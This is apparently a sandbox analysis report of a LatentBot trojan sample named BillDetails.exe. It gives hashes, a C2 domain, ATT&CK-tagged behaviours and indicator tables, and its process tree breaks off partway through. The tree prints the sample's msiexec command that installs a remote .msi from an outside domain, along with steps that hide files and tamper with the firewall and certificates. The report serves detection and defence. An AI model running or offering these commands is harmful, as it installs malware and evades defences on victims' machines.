latentbot | 0f6c99a0e331ab6eae07a1d98a80d839f8c2e025bd17a587a6c5eead001acc38

Analysis

max time kernel
145s
max time network
148s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
09-10-2024 19:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BillDetails.exe
Size

3.9MB
MD5

f9fdaa73953ce9a148bc4b465ab1408f
SHA1

a2f259b8f8ddfae8994eb8200b8d89c256ddc13d
SHA256

0f6c99a0e331ab6eae07a1d98a80d839f8c2e025bd17a587a6c5eead001acc38
SHA512

889440392c11a0de283d6bf32ec4ba2c3e9aca463b7f96562815e1c2e06b1fe1f0a719896bfbb158ca7c1d557120fa73c82576f987ac76b28a0b8e598c111466
SSDEEP

98304:6tlEb9+zykLmOCYNW/WrHwOnvE8sJXcMv5ezs2rEPqtxLA:6tSb9+zykLmxd/cHwOkp7uA

Score

10^/10

latentbot discovery evasion persistence privilege_escalation trojan

Malware Config

Extracted

Family

latentbot

besthard2024.zapto.org

Signatures

LatentBot
Modular trojan written in Delphi which has been in-the-wild since 2013.
trojan latentbot

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
2468	netsh.exe
1616	netsh.exe

Executes dropped EXE 4 IoCs

Processes:

MSIBA72.tmpPrintDrivers.exePrintDriver.exePrintDrivers.exe

pid	Process
1620	MSIBA72.tmp
1772	PrintDrivers.exe
2940	PrintDriver.exe
1836	PrintDrivers.exe

Loads dropped DLL 5 IoCs

Processes:

MsiExec.exeMsiExec.execmd.exe

pid	Process
2044	MsiExec.exe
1968	MsiExec.exe
1968	MsiExec.exe
1968	MsiExec.exe
2732	cmd.exe

Use of msiexec (install) with remote resource 1 IoCs

Processes:

msiexec.exe

pid	Process
2164	msiexec.exe

Blocklisted process makes network request 3 IoCs

Processes:

msiexec.exemsiexec.exe

flow	pid	Process
12	2164	msiexec.exe
14	2164	msiexec.exe
16	808	msiexec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exeBillDetails.exemsiexec.exe

description	ioc	Process
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	BillDetails.exe
File opened (read-only)	\??\P:	BillDetails.exe
File opened (read-only)	\??\Z:	BillDetails.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\L:	BillDetails.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	BillDetails.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	BillDetails.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	BillDetails.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	BillDetails.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	BillDetails.exe
File opened (read-only)	\??\U:	BillDetails.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	BillDetails.exe
File opened (read-only)	\??\I:	BillDetails.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\M:	BillDetails.exe
File opened (read-only)	\??\O:	BillDetails.exe
File opened (read-only)	\??\R:	BillDetails.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	BillDetails.exe
File opened (read-only)	\??\W:	BillDetails.exe
File opened (read-only)	\??\Y:	BillDetails.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\G:	BillDetails.exe
File opened (read-only)	\??\V:	BillDetails.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\J:	BillDetails.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	BillDetails.exe
File opened (read-only)	\??\R:	msiexec.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exemsiexec.exe

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIB771.tmp	msiexec.exe
File created	C:\Windows\Installer\f76b8d6.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB9E4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBA72.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f76b8d6.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAB4D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB80E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB88C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exeattrib.exeattrib.execmd.execmd.exeMsiExec.exemsiexec.exeMsiExec.exePrintDrivers.exeBillDetails.exeMSIBA72.tmpPrintDrivers.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrintDrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BillDetails.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIBA72.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrintDrivers.exe

Delays execution with timeout.exe 10 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
372	timeout.exe
2708	timeout.exe
2112	timeout.exe
1676	timeout.exe
1340	timeout.exe
2544	timeout.exe
1496	timeout.exe
2252	timeout.exe
1008	timeout.exe
1028	timeout.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Kills process with taskkill 3 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid	Process
2984	taskkill.exe
2004	taskkill.exe
572	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

msiexec.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	msiexec.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

BillDetails.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	BillDetails.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	BillDetails.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	BillDetails.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	BillDetails.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PrintDrivers.exe

pid	Process
1836	PrintDrivers.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msiexec.exePrintDrivers.exe

pid	Process
808	msiexec.exe
808	msiexec.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe
1772	PrintDrivers.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exeBillDetails.exe

description	pid	Process
Token: SeRestorePrivilege	808	msiexec.exe
Token: SeTakeOwnershipPrivilege	808	msiexec.exe
Token: SeSecurityPrivilege	808	msiexec.exe
Token: SeCreateTokenPrivilege	2420	BillDetails.exe
Token: SeAssignPrimaryTokenPrivilege	2420	BillDetails.exe
Token: SeLockMemoryPrivilege	2420	BillDetails.exe
Token: SeIncreaseQuotaPrivilege	2420	BillDetails.exe
Token: SeMachineAccountPrivilege	2420	BillDetails.exe
Token: SeTcbPrivilege	2420	BillDetails.exe
Token: SeSecurityPrivilege	2420	BillDetails.exe
Token: SeTakeOwnershipPrivilege	2420	BillDetails.exe
Token: SeLoadDriverPrivilege	2420	BillDetails.exe
Token: SeSystemProfilePrivilege	2420	BillDetails.exe
Token: SeSystemtimePrivilege	2420	BillDetails.exe
Token: SeProfSingleProcessPrivilege	2420	BillDetails.exe
Token: SeIncBasePriorityPrivilege	2420	BillDetails.exe
Token: SeCreatePagefilePrivilege	2420	BillDetails.exe
Token: SeCreatePermanentPrivilege	2420	BillDetails.exe
Token: SeBackupPrivilege	2420	BillDetails.exe
Token: SeRestorePrivilege	2420	BillDetails.exe
Token: SeShutdownPrivilege	2420	BillDetails.exe
Token: SeDebugPrivilege	2420	BillDetails.exe
Token: SeAuditPrivilege	2420	BillDetails.exe
Token: SeSystemEnvironmentPrivilege	2420	BillDetails.exe
Token: SeChangeNotifyPrivilege	2420	BillDetails.exe
Token: SeRemoteShutdownPrivilege	2420	BillDetails.exe
Token: SeUndockPrivilege	2420	BillDetails.exe
Token: SeSyncAgentPrivilege	2420	BillDetails.exe
Token: SeEnableDelegationPrivilege	2420	BillDetails.exe
Token: SeManageVolumePrivilege	2420	BillDetails.exe
Token: SeImpersonatePrivilege	2420	BillDetails.exe
Token: SeCreateGlobalPrivilege	2420	BillDetails.exe
Token: SeCreateTokenPrivilege	2420	BillDetails.exe
Token: SeAssignPrimaryTokenPrivilege	2420	BillDetails.exe
Token: SeLockMemoryPrivilege	2420	BillDetails.exe
Token: SeIncreaseQuotaPrivilege	2420	BillDetails.exe
Token: SeMachineAccountPrivilege	2420	BillDetails.exe
Token: SeTcbPrivilege	2420	BillDetails.exe
Token: SeSecurityPrivilege	2420	BillDetails.exe
Token: SeTakeOwnershipPrivilege	2420	BillDetails.exe
Token: SeLoadDriverPrivilege	2420	BillDetails.exe
Token: SeSystemProfilePrivilege	2420	BillDetails.exe
Token: SeSystemtimePrivilege	2420	BillDetails.exe
Token: SeProfSingleProcessPrivilege	2420	BillDetails.exe
Token: SeIncBasePriorityPrivilege	2420	BillDetails.exe
Token: SeCreatePagefilePrivilege	2420	BillDetails.exe
Token: SeCreatePermanentPrivilege	2420	BillDetails.exe
Token: SeBackupPrivilege	2420	BillDetails.exe
Token: SeRestorePrivilege	2420	BillDetails.exe
Token: SeShutdownPrivilege	2420	BillDetails.exe
Token: SeDebugPrivilege	2420	BillDetails.exe
Token: SeAuditPrivilege	2420	BillDetails.exe
Token: SeSystemEnvironmentPrivilege	2420	BillDetails.exe
Token: SeChangeNotifyPrivilege	2420	BillDetails.exe
Token: SeRemoteShutdownPrivilege	2420	BillDetails.exe
Token: SeUndockPrivilege	2420	BillDetails.exe
Token: SeSyncAgentPrivilege	2420	BillDetails.exe
Token: SeEnableDelegationPrivilege	2420	BillDetails.exe
Token: SeManageVolumePrivilege	2420	BillDetails.exe
Token: SeImpersonatePrivilege	2420	BillDetails.exe
Token: SeCreateGlobalPrivilege	2420	BillDetails.exe
Token: SeCreateTokenPrivilege	2420	BillDetails.exe
Token: SeAssignPrimaryTokenPrivilege	2420	BillDetails.exe
Token: SeLockMemoryPrivilege	2420	BillDetails.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

msiexec.exePrintDriver.exe

pid	Process
2164	msiexec.exe
2164	msiexec.exe
2940	PrintDriver.exe
2940	PrintDriver.exe
2940	PrintDriver.exe
2940	PrintDriver.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

PrintDriver.exe

pid	Process
2940	PrintDriver.exe
2940	PrintDriver.exe
2940	PrintDriver.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exeBillDetails.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 808 wrote to memory of 2044	808	msiexec.exe	32
PID 808 wrote to memory of 2044	808	msiexec.exe	32
PID 808 wrote to memory of 2044	808	msiexec.exe	32
PID 808 wrote to memory of 2044	808	msiexec.exe	32
PID 808 wrote to memory of 2044	808	msiexec.exe	32
PID 808 wrote to memory of 2044	808	msiexec.exe	32
PID 808 wrote to memory of 2044	808	msiexec.exe	32
PID 2420 wrote to memory of 2164	2420	BillDetails.exe	33
PID 2420 wrote to memory of 2164	2420	BillDetails.exe	33
PID 2420 wrote to memory of 2164	2420	BillDetails.exe	33
PID 2420 wrote to memory of 2164	2420	BillDetails.exe	33
PID 2420 wrote to memory of 2164	2420	BillDetails.exe	33
PID 2420 wrote to memory of 2164	2420	BillDetails.exe	33
PID 2420 wrote to memory of 2164	2420	BillDetails.exe	33
PID 808 wrote to memory of 1968	808	msiexec.exe	34
PID 808 wrote to memory of 1968	808	msiexec.exe	34
PID 808 wrote to memory of 1968	808	msiexec.exe	34
PID 808 wrote to memory of 1968	808	msiexec.exe	34
PID 808 wrote to memory of 1968	808	msiexec.exe	34
PID 808 wrote to memory of 1968	808	msiexec.exe	34
PID 808 wrote to memory of 1968	808	msiexec.exe	34
PID 808 wrote to memory of 1620	808	msiexec.exe	35
PID 808 wrote to memory of 1620	808	msiexec.exe	35
PID 808 wrote to memory of 1620	808	msiexec.exe	35
PID 808 wrote to memory of 1620	808	msiexec.exe	35
PID 808 wrote to memory of 1620	808	msiexec.exe	35
PID 808 wrote to memory of 1620	808	msiexec.exe	35
PID 808 wrote to memory of 1620	808	msiexec.exe	35
PID 2420 wrote to memory of 692	2420	BillDetails.exe	38
PID 2420 wrote to memory of 692	2420	BillDetails.exe	38
PID 2420 wrote to memory of 692	2420	BillDetails.exe	38
PID 2420 wrote to memory of 692	2420	BillDetails.exe	38
PID 692 wrote to memory of 2584	692	cmd.exe	41
PID 692 wrote to memory of 2584	692	cmd.exe	41
PID 692 wrote to memory of 2584	692	cmd.exe	41
PID 692 wrote to memory of 2584	692	cmd.exe	41
PID 560 wrote to memory of 1752	560	cmd.exe	42
PID 560 wrote to memory of 1752	560	cmd.exe	42
PID 560 wrote to memory of 1752	560	cmd.exe	42
PID 560 wrote to memory of 2152	560	cmd.exe	43
PID 560 wrote to memory of 2152	560	cmd.exe	43
PID 560 wrote to memory of 2152	560	cmd.exe	43
PID 560 wrote to memory of 1780	560	cmd.exe	44
PID 560 wrote to memory of 1780	560	cmd.exe	44
PID 560 wrote to memory of 1780	560	cmd.exe	44
PID 1780 wrote to memory of 988	1780	cmd.exe	45
PID 1780 wrote to memory of 988	1780	cmd.exe	45
PID 1780 wrote to memory of 988	1780	cmd.exe	45
PID 560 wrote to memory of 2512	560	cmd.exe	46
PID 560 wrote to memory of 2512	560	cmd.exe	46
PID 560 wrote to memory of 2512	560	cmd.exe	46
PID 560 wrote to memory of 1756	560	cmd.exe	47
PID 560 wrote to memory of 1756	560	cmd.exe	47
PID 560 wrote to memory of 1756	560	cmd.exe	47
PID 692 wrote to memory of 2084	692	cmd.exe	49
PID 692 wrote to memory of 2084	692	cmd.exe	49
PID 692 wrote to memory of 2084	692	cmd.exe	49
PID 692 wrote to memory of 2084	692	cmd.exe	49
PID 692 wrote to memory of 2024	692	cmd.exe	50
PID 692 wrote to memory of 2024	692	cmd.exe	50
PID 692 wrote to memory of 2024	692	cmd.exe	50
PID 692 wrote to memory of 2024	692	cmd.exe	50
PID 692 wrote to memory of 2368	692	cmd.exe	51
PID 692 wrote to memory of 2368	692	cmd.exe	51

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
2584	attrib.exe
2084	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BillDetails.exe
"C:\Users\Admin\AppData\Local\Temp\BillDetails.exe"
1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2420
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i https://www.walteryhu.site/PrintViewer.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\BillDetails.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1728242400 "
  2⤵
  - Use of msiexec (install) with remote resource
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:2164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\EXEBB15.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:692
- - C:\Windows\SysWOW64\attrib.exe
    C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\AIE9C8F.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2584
- - C:\Windows\SysWOW64\attrib.exe
